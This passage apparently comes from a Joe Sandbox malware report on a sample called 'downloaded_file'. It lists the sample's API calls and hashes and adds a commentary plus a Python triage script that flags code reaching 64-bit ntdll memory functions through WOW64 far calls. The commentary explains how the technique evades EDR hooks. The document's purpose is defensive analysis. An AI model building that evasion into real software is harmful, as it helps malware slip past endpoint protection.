                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$EventFreeObjectSingleVirtualWait
                                                                                                            • String ID: d
                                                                                                            • API String ID: 971639600-2564639436
                                                                                                            • Opcode ID: 6fcb95f32a56dbeb76203db61afcf8e66ae977f2ef168d3fef06bf735f8c966e
                                                                                                            • Instruction ID: 65cb62ac6a172a97a41f0b38c68bff9b3e0d3e3b0a0199475021d443abaf309b
                                                                                                            • Opcode Fuzzy Hash: 6fcb95f32a56dbeb76203db61afcf8e66ae977f2ef168d3fef06bf735f8c966e
                                                                                                            • Instruction Fuzzy Hash: EB31FE31600814DBFB2ACF88C6E5A6DB776FB90309F1582ACD0166F6D5C735EA46DB40
                                                                                                            APIs
                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NW;;;LW),00000001,00000000,00000000), ref: 0031C456
                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(00000000,00000000,00000000,00000000), ref: 0031C470
                                                                                                            • SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0031C48C
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031C499
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Security$Descriptor$ConvertFreeInfoLocalNamedSaclString
                                                                                                            • String ID: S:(ML;;NW;;;LW)
                                                                                                            • API String ID: 173816248-495562761
                                                                                                            APIs
                                                                                                            • ___BuildCatchObject.LIBCMT ref: 00327A25
                                                                                                              • Part of subcall function 00327980: ___BuildCatchObjectHelper.LIBCMT ref: 003279B6
                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 00327A3C
                                                                                                            • ___FrameUnwindToState.LIBCMT ref: 00327A4A
                                                                                                            Strings
                                                                                                            Similarity
                                                                                                            • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                            • String ID: csm$csm
                                                                                                            • API String ID: 2163707966-3733052814
                                                                                                            APIs
                                                                                                            • _malloc.LIBCMT ref: 00324212
                                                                                                              • Part of subcall function 00324619: __FF_MSGBANNER.LIBCMT ref: 00324632
                                                                                                              • Part of subcall function 00324619: __NMSG_WRITE.LIBCMT ref: 00324639
                                                                                                              • Part of subcall function 00324619: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,00305B93,?), ref: 0032465E
                                                                                                            • std::exception::exception.LIBCMT ref: 00324247
                                                                                                            • std::exception::exception.LIBCMT ref: 00324261
                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00324272
                                                                                                            Strings
                                                                                                            Similarity
                                                                                                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                            • String ID: Ea1
                                                                                                            • API String ID: 615853336-2754137317
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0030108E), ref: 0031C1EB
                                                                                                            • GetProcAddress.KERNEL32(0030108E,IsWow64Process), ref: 0031C204
                                                                                                            • GetCurrentProcess.KERNEL32(00000000), ref: 0031C220
                                                                                                            Strings
                                                                                                            Similarity
                                                                                                            • API ID: AddressCurrentHandleModuleProcProcess
                                                                                                            • String ID: IsWow64Process$KERNEL32.DLL
                                                                                                            • API String ID: 4190356694-1193389583
                                                                                                            APIs
                                                                                                            • __getptd.LIBCMT ref: 003273D9
                                                                                                              • Part of subcall function 003281BE: __getptd_noexit.LIBCMT ref: 003281C1
                                                                                                              • Part of subcall function 003281BE: __amsg_exit.LIBCMT ref: 003281CE
                                                                                                            • __getptd.LIBCMT ref: 003273EA
                                                                                                            • __getptd.LIBCMT ref: 003273F8
                                                                                                            Strings
                                                                                                            Similarity
                                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                            • String ID: MOC$RCC
                                                                                                            • API String ID: 803148776-2084237596
                                                                                                            APIs
                                                                                                            • LoadLibraryW.KERNEL32(USER32.DLL,?,?,00301089), ref: 00309C9B
                                                                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDPIAware), ref: 00309CB3
                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00309CCC
                                                                                                            Strings
                                                                                                            Similarity
                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                            • String ID: SetProcessDPIAware$USER32.DLL
                                                                                                            • API String ID: 145871493-772676101
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00316DC7
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00316DF9
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00316E17
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0000E020,-00379F18,00000004,00000000), ref: 00316E4C
                                                                                                            • ResumeThread.KERNEL32(00000000), ref: 00316E8C
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00316EF9
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00316F31
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00316F63
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00316F81
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0000E020,-00379F18,00000004,00000000), ref: 00316FB5
                                                                                                            • ResumeThread.KERNEL32(00000000), ref: 00316FF5
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateHandleThread$EventResume$ObjectSingleWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 738346648-0
                                                                                                            APIs
                                                                                                            • WSACreateEvent.WS2_32 ref: 00320876
                                                                                                            • WSAEventSelect.WS2_32(?,00000000,00000002), ref: 00320893
                                                                                                            • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000001,00000000), ref: 003208D3
                                                                                                            • WSACloseEvent.WS2_32(00000000), ref: 003208E0
                                                                                                            • WSACloseEvent.WS2_32(00000000), ref: 00320939
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Event$Close$CreateEventsMultipleSelectWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 2166016019-0
                                                                                                            APIs
                                                                                                            • WSACreateEvent.WS2_32 ref: 00320796
                                                                                                            • WSAEventSelect.WS2_32(?,00000000,00000001), ref: 003207B3
                                                                                                            • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000001,00000000), ref: 003207F3
                                                                                                            • WSACloseEvent.WS2_32(00000000), ref: 00320800
                                                                                                            • WSACloseEvent.WS2_32(00000000), ref: 00320859
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Event$Close$CreateEventsMultipleSelectWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 2166016019-0
                                                                                                            APIs
                                                                                                            • _malloc.LIBCMT ref: 0032E472
                                                                                                              • Part of subcall function 00324619: __FF_MSGBANNER.LIBCMT ref: 00324632
                                                                                                              • Part of subcall function 00324619: __NMSG_WRITE.LIBCMT ref: 00324639
                                                                                                              • Part of subcall function 00324619: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,00305B93,?), ref: 0032465E
                                                                                                            • _free.LIBCMT ref: 0032E485
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap_free_malloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 1020059152-0
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000018), ref: 0032284A
                                                                                                              • Part of subcall function 0030FE20: SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 0030FE74
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(?), ref: 0030FE86
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(00371110), ref: 0030FE99
                                                                                                              • Part of subcall function 0030FE20: LocalAlloc.KERNEL32(00000040,?), ref: 0030FEB2
                                                                                                              • Part of subcall function 0030FE20: __snwprintf.LIBCMT ref: 0030FEDA
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(00000000), ref: 0030FEE6
                                                                                                              • Part of subcall function 0030FE20: CoTaskMemFree.COMBASE(?), ref: 0030FEF5
                                                                                                            • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0032287D
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003228B8
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003228C7
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003228D1
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$lstrlen$Alloc$AttributesFileFolderKnownPathTask__snwprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 1368272246-0
                                                                                                            APIs
                                                                                                              • Part of subcall function 003081C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,00308D2B,00316B10,00000000), ref: 003081EB
                                                                                                              • Part of subcall function 003081C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,00308D2B), ref: 00308205
                                                                                                              • Part of subcall function 003081C0: wnsprintfW.SHLWAPI ref: 00308235
                                                                                                              • Part of subcall function 003081C0: wnsprintfW.SHLWAPI ref: 00308251
                                                                                                              • Part of subcall function 003081C0: LocalFree.KERNEL32(00000000), ref: 00308A43
                                                                                                              • Part of subcall function 00301C60: _wcsrchr.LIBCMT ref: 00301C6C
                                                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 00309630
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030963F
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00309649
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030965A
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00309664
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$Allocwnsprintf$AttributesFile_wcsrchr
                                                                                                            • String ID:
                                                                                                            • API String ID: 3823319188-0
                                                                                                            APIs
                                                                                                            • SetEvent.KERNEL32(?), ref: 0031C915
                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0031C924
                                                                                                            • CloseHandle.KERNEL32(?), ref: 0031C931
                                                                                                            • CloseHandle.KERNEL32(?), ref: 0031C93E
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031C958
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$EventFreeLocalObjectSingleWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 3879024238-0
                                                                                                            • Opcode ID: ff71483dd8d4672ad641d5d3e950312bd583a0760f2fa4cb9219dba3d79351c5
                                                                                                            • Instruction ID: 220845a96ee8d8671777aa8cd405fd9465e65af86d6f9507e4752f43ac81e5fb
                                                                                                            • Opcode Fuzzy Hash: ff71483dd8d4672ad641d5d3e950312bd583a0760f2fa4cb9219dba3d79351c5
                                                                                                            • Instruction Fuzzy Hash: 0311BE79A10208EFCB09DF94D98899DBBB9FF4C711F208288E90967350D734AE85DF90
APIs
  • Part of subcall function 00313350: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 00313364
  • Part of subcall function 00313350: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 00313385
  • Part of subcall function 00313350: SHGetKnownFolderPath.SHELL32(00337C30,00000000,00000000,00000000), ref: 003133AC
  • Part of subcall function 00313350: lstrlenW.KERNEL32(00000000), ref: 003133BA
  • Part of subcall function 00313350: __snwprintf.LIBCMT ref: 003133E4
  • Part of subcall function 00313350: __snwprintf.LIBCMT ref: 003133FE
  • Part of subcall function 00313350: LocalFree.KERNEL32(00000000), ref: 0031340A
  • Part of subcall function 00313350: CoTaskMemFree.COMBASE(00000000), ref: 00313414
• GetFileAttributesW.KERNEL32(00000000), ref: 003132CF
• LocalFree.KERNEL32(00000000), ref: 003132E2
• GetFileAttributesW.KERNEL32(00000000), ref: 00313312
• LocalFree.KERNEL32(00000000), ref: 00313325
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: Local$Free$AllocAttributesFile__snwprintf$FolderKnownPathTasklstrlen
• String ID:
• API String ID: 1889006086-0
• Opcode ID: a14c201d3f055471364a5a39d6bf72b45decfb9f0556a83ff35842be71c2c79a
• Instruction ID: 9a95e9fe40120c936aa6b056edea6e06ff6ed284f961d00ed86eaca250a371ab
• Opcode Fuzzy Hash: a14c201d3f055471364a5a39d6bf72b45decfb9f0556a83ff35842be71c2c79a
• Instruction Fuzzy Hash: 67110079D10208EFDB25EFB4D9486DDBBB8EF48301F1088A8E515E7280D7758B80DB55
APIs
• CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,0031BBFD), ref: 00304217
• CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,0031BBFD), ref: 00304233
• CreateThread.KERNEL32(00000000,00000000,00304320,00000000,00000000,00000000), ref: 00304256
• CloseHandle.KERNEL32(00000000,?,0031BBFD), ref: 00304277
• CloseHandle.KERNEL32(00000000,?,0031BBFD), ref: 0030428E
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: Create$CloseEventHandle$Thread
• String ID:
• API String ID: 3315681087-0
• Opcode ID: 7ed1d42709f1cde1e6d1c7c6cf7bf3e41639e487744986e63d0f2a98e5985947
• Instruction ID: 73ec9be29fa155eef7ae71269e821dd6189dd420022068b0233e9863007d0066
• Opcode Fuzzy Hash: 7ed1d42709f1cde1e6d1c7c6cf7bf3e41639e487744986e63d0f2a98e5985947
• Instruction Fuzzy Hash: 8F118374297300EFE7339B64ED9EB5A7ABCA704705F110829FA096A2F1CBB465D4CA04
APIs
• __getptd.LIBCMT ref: 003292E8
  • Part of subcall function 003281BE: __getptd_noexit.LIBCMT ref: 003281C1
  • Part of subcall function 003281BE: __amsg_exit.LIBCMT ref: 003281CE
• __getptd.LIBCMT ref: 003292FF
• __amsg_exit.LIBCMT ref: 0032930D
• __lock.LIBCMT ref: 0032931D
• __updatetlocinfoEx_nolock.LIBCMT ref: 00329331
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
• String ID:
• API String ID: 938513278-0
• Opcode ID: 1b71fcbfe0ff60b11d2f02de01f67e0bf9080bb5a22d89f10ec9d77506c7d85b
• Instruction ID: 7bf9660fa40f93be5593d306d2dd12c60c5fc292deea2838d11c2d157d18b839
• Opcode Fuzzy Hash: 1b71fcbfe0ff60b11d2f02de01f67e0bf9080bb5a22d89f10ec9d77506c7d85b
• Instruction Fuzzy Hash: 6CF0B432905734DADB33FB78B80774D73A0BF00B21F12410AF544AF2E2CB2469518A97
APIs
• CoInitialize.OLE32(00000000), ref: 0031C978
• CoCreateGuid.COMBASE(?), ref: 0031C982
• StringFromGUID2.COMBASE(?,?,00000027), ref: 0031C996
• CoUninitialize.COMBASE ref: 0031C9A0
• CoUninitialize.COMBASE ref: 0031C9AD
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: Uninitialize$CreateFromGuidInitializeString
• String ID:
• API String ID: 46189592-0
• Opcode ID: 5cd67f4c8775734f537b20d538af4584ab2fb576d93195c962911de6ffe137ca
• Instruction ID: b968780d18cde3a395e7e30d05dfaf40f6597cb76ca2021a948f31f0c36124fb
• Opcode Fuzzy Hash: 5cd67f4c8775734f537b20d538af4584ab2fb576d93195c962911de6ffe137ca
• Instruction Fuzzy Hash: 3DE092313542099BD752AFB4ED0DFAA37BCAF0C701F405418F909C6150E772E480CB52
APIs
• CloseHandle.KERNEL32(00000000), ref: 00321534
• ReleaseMutex.KERNEL32(00000000), ref: 0032154E
• CloseHandle.KERNEL32(00000000), ref: 00321558
• CloseHandle.KERNEL32(00000000), ref: 00321568
• CloseHandle.KERNEL32(00000000), ref: 00321572
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: CloseHandle$MutexRelease
• String ID:
• API String ID: 2279609368-0
• Opcode ID: 5e9a16cf408363ca57efa59102c29214a867436db4b1ae8a1479bc8c8943dbaa
• Instruction ID: 46746f711cc4c4e61883be6e2778b3c6a9146999bf74d680c36971c6b2c39058
• Opcode Fuzzy Hash: 5e9a16cf408363ca57efa59102c29214a867436db4b1ae8a1479bc8c8943dbaa
• Instruction Fuzzy Hash: 46F01C75900204EBC72ADFA4E98CB6EB779FB88301F608588E506A2260C739D984CF50
APIs
• GetProcAddress64.DOWNLOADED_FILE(00000000,?,NtReadVirtualMemory), ref: 003064D4
• X64Call.DOWNLOADED_FILE(00000000,00000000,00000005,?,?,?,?,00000000,00000000,?,00000000,?,00000000), ref: 00306554
• SetLastErrorFromX64Call.DOWNLOADED_FILE(00000000,?), ref: 00306576
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: Call$Address64ErrorFromLastProc
• String ID: NtReadVirtualMemory
• API String ID: 3570319994-2166501906
• Opcode ID: 06abd8a9d6c43b0d5136f3d6d757593f2a6595c98acaff8ea6370585e28ee69f
• Instruction ID: 15efc77c7e6cd5025b8cb3059d0acd5109414102d6f02560ca9922bbd9c68a10
• Opcode Fuzzy Hash: 06abd8a9d6c43b0d5136f3d6d757593f2a6595c98acaff8ea6370585e28ee69f
• Instruction Fuzzy Hash: 96310CB0911209EFEF16CF58DC56BAB77B8AB48704F108429F805A72D8E7749990CF61
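The function above and the one that follows it show the same pattern: the 32-bit payload resolves an export from the 64-bit ntdll with GetProcAddress64 (NtReadVirtualMemory here, NtWriteVirtualMemory next) and invokes it through X64Call, a far call into 64-bit code. Those helper names match the open-source wow64ext library; the technique lets WOW64 code reach the native 64-bit ntdll directly and sidesteps hooks a user-mode EDR placed in the 32-bit ntdll, which is consistent with the "direct / indirect syscall" and process-injection signatures in the overview. The script below is an added triage example, not part of the Joe Sandbox report or of the sample: it parses APIs lists in the report's row format and flags any function that pairs that resolver with the far-call helper and an Nt*/Zw* name. The sample text is an abbreviated excerpt of this report's own rows; the helper names it keys on (GetProcAddress64, X64Call) are taken from the report's symbolization and are the heuristic's assumption.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# One row of a Joe Sandbox "APIs" list, e.g.
#   • X64Call.DOWNLOADED_FILE(00000000,00000000,00000005,?), ref: 00306554
#   • Part of subcall function 00313350: LocalFree.KERNEL32(00000000), ref: 0031340A
API_LINE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][\w@?]*)\.(?P<mod>[A-Za-z_]\w*)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?"
)
# ntdll's native-API export families.
NATIVE_NAME = re.compile(r"^(Nt|Zw)[A-Z]\w+$")

# Helper names for "resolve an export of the 64-bit ntdll" and "far-call into 64-bit code".
# Assumption: taken from the report's symbolization (wow64ext naming), not from any spec.
RESOLVER_64 = "GetProcAddress64"
FARCALL_64 = "X64Call"


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall: Optional[str]  # callee address when the row is "Part of subcall function"


def parse_api_blocks(lines) -> List[List[ApiCall]]:
    """Group rows under each 'APIs' heading; a 'Memory Dump Source' line closes the block."""
    blocks: List[List[ApiCall]] = []
    current: Optional[List[ApiCall]] = None
    for raw in lines:
        line = raw.strip()
        if line == "APIs":
            current = []
            blocks.append(current)
            continue
        if line.startswith("Memory Dump Source"):
            current = None
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if not m:
            continue  # e.g. an empty "Strings" heading inside the entry
        args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
        current.append(ApiCall(m.group("api"), m.group("mod"), args, m.group("ref") or "", m.group("sub")))
    return blocks


def wow64_native_calls(block: List[ApiCall]) -> List[str]:
    """Nt*/Zw* names a block resolves via GetProcAddress64 and then reaches through X64Call."""
    resolved = [a for c in block if c.api == RESOLVER_64 for a in c.args if NATIVE_NAME.match(a)]
    if resolved and any(c.api == FARCALL_64 for c in block):
        return resolved
    return []


def triage(report_text: str) -> List[Tuple[int, List[str]]]:
    """(block index, native APIs) for every block that calls the 64-bit ntdll from 32-bit code."""
    hits = []
    for idx, block in enumerate(parse_api_blocks(report_text.splitlines())):
        natives = wow64_native_calls(block)
        if natives:
            hits.append((idx, natives))
    return hits


def native_primitives(report_text: str) -> List[str]:
    """Sorted, de-duplicated 64-bit native APIs the whole dump reaches this way."""
    return sorted({name for _, names in triage(report_text) for name in names})


# Sample input: an abbreviated excerpt of this report's own APIs rows (four function entries).
SAMPLE_REPORT = """\
APIs
  • Part of subcall function 00313350: SHGetKnownFolderPath.SHELL32(00337C30,00000000,00000000,00000000), ref: 003133AC
  • Part of subcall function 00313350: __snwprintf.LIBCMT ref: 003133E4
• GetFileAttributesW.KERNEL32(00000000), ref: 003132CF
• LocalFree.KERNEL32(00000000), ref: 003132E2
Memory Dump Source
APIs
• CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,0031BBFD), ref: 00304217
• CreateThread.KERNEL32(00000000,00000000,00304320,00000000,00000000,00000000), ref: 00304256
• CloseHandle.KERNEL32(00000000,?,0031BBFD), ref: 00304277
Memory Dump Source
APIs
• GetProcAddress64.DOWNLOADED_FILE(00000000,?,NtReadVirtualMemory), ref: 003064D4
• X64Call.DOWNLOADED_FILE(00000000,00000000,00000005,?,?,?,?,00000000,00000000,?,00000000,?,00000000), ref: 00306554
• SetLastErrorFromX64Call.DOWNLOADED_FILE(00000000,?), ref: 00306576
Strings
Memory Dump Source
APIs
• GetProcAddress64.DOWNLOADED_FILE(00000000,?,NtWriteVirtualMemory), ref: 003065C4
• X64Call.DOWNLOADED_FILE(00000000,00000000,00000005,?,?,?,?,00000000,00000000,?,00000000,?,00000000), ref: 00306644
• SetLastErrorFromX64Call.DOWNLOADED_FILE(00000000,?), ref: 00306666
Strings
Memory Dump Source
"""

if __name__ == "__main__":
    for idx, names in triage(SAMPLE_REPORT):
        print(f"block {idx}: 64-bit ntdll reached via far call -> {', '.join(names)}")
    print("native memory primitives:", native_primitives(SAMPLE_REPORT))
```

Run it against a saved copy of a report's function listing instead of the embedded excerpt by reading the file into `triage`; a dump whose hits cover both NtReadVirtualMemory and NtWriteVirtualMemory has cross-process memory read and write primitives that a hook on the 32-bit ntdll would never see.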
                                                                                                            APIs
                                                                                                            • GetProcAddress64.DOWNLOADED_FILE(00000000,?,NtWriteVirtualMemory), ref: 003065C4
